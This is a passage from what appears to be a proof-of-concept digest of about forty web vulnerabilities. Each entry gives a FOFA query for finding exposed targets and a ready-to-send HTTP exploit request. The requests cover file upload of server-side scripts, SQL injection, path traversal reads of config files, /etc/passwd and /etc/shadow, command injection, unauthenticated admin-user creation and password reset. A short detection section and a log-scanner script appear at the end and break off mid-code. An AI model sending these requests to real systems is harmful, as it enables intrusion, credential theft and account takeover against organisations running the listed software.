FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64 encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 (HJSOFT) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景 (HJSOFT) EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景 (HJSOFT) EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT high-definition license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 (REALOR) application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation installations.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical viewing system deleteStudy SQL injection
FOFA: app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

WAITFOR DELAY '0:0:5' is a stacked-query time probe for Microsoft SQL Server; the response arrives about five seconds late on a vulnerable host.

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA: title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA: body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

Note the /js/../ prefix in the path: the request reaches NavigationAjax through a directory that is normally exempt from authentication.

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA: title="用户登录_富通天下外贸ERP"
The PoC passes the stored file's extension through the name query parameter and posts the source of an .ashx handler as the body.
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴 security management system setSystemTimeAction command execution
FOFA: body="山石云鉴主机安全管理系统"
Step 1. Fetch a CSRF token. The PHPSESSID value is chosen by the client and is reused unchanged in step 2:
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Step 2. Submit the command with the token from step 1 in place of {{token}}. The param value is evaluated as Python; the payload writes a marker file into a directory served under /master/img/:
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Step 3. Retrieve the marker to confirm execution:
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA: app="FE-协作平台"
Quick check: if a request to /servlet/uploadAttachmentServlet returns a response, the vulnerable servlet is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

The traversal sequence in filename walks out of the attachment directory and drops the JSP into the deployed fe.war.

195. 飞鱼星 internet behaviour management system send_order.cgi command execution
FOFA: title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA: body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

The request carries no credentials or session: xgh is the target account identifier and newPass the password to set.

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA: app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

A vulnerable host echoes 12321 (111*111) in the response; the ;.js suffix on the path is what gets the request past the authentication filter.

198. 阿里云盘 (aliyundrive-webdav) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

The sid value decodes to `ls />/www/aaa.txt` (backtick command substitution), writing the directory listing to a file under the web root. The PoC sends a LuCI sysauth cookie, i.e. it runs in an authenticated session.

199. Cockpit CMS assetsmanager/upload file upload
FOFA: title="Authenticate Please!"
Step 1. Request the login page to obtain the CSRF token (the PoC then logs in with admin/admin, uploads a file and requests it):
GET /auth/login?to=/ HTTP/1.1

Response: 200; the body contains
csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

Step 2. Exchange the token (a JWT) and the credentials for a session cookie:
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200 with
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

Step 3. Upload a PHP file with the session cookie:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

The uploaded file is then served at /storage/uploads/tttt.php (the PoC's payload deletes itself on first request).

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA: app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 (Founder news editing system) binary.do SQL injection
FOFA: body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

The TableName parameter is concatenated straight into the query, so the payload appends a WHERE clause, a UNION and a stacked WAITFOR DELAY.

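The GET-based payloads above (entries 188, 189, 197, 198 and 200) leave their indicator in the request line, so they can be hunted retroactively in ordinary web-server access logs. The scanner below is an added example written for this digest; it is not code from the source article or from any vendor listed here. The log lines are constructed from the request lines above (not real captures), and the indicator set (time-based delays, UNION SELECT, /etc/passwd and file:// reads, backtick- or semicolon-prefixed commands) is generalised slightly beyond the literal payloads on the page. POST bodies (entries 186, 187, 190, 191, 193, 195, 196 and 201) never reach access logs; for those, the same regexes have to run over WAF or application-level request logs.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in combined log format, built from the GET request
# lines of entries 189, 200, 197, 188 and 198 above plus one benign request.
# These are not real captured logs.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jun/2024:10:01:02 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [05/Jun/2024:10:01:09 +0800] "GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" 200 13 "-" "Mozilla/5.0"
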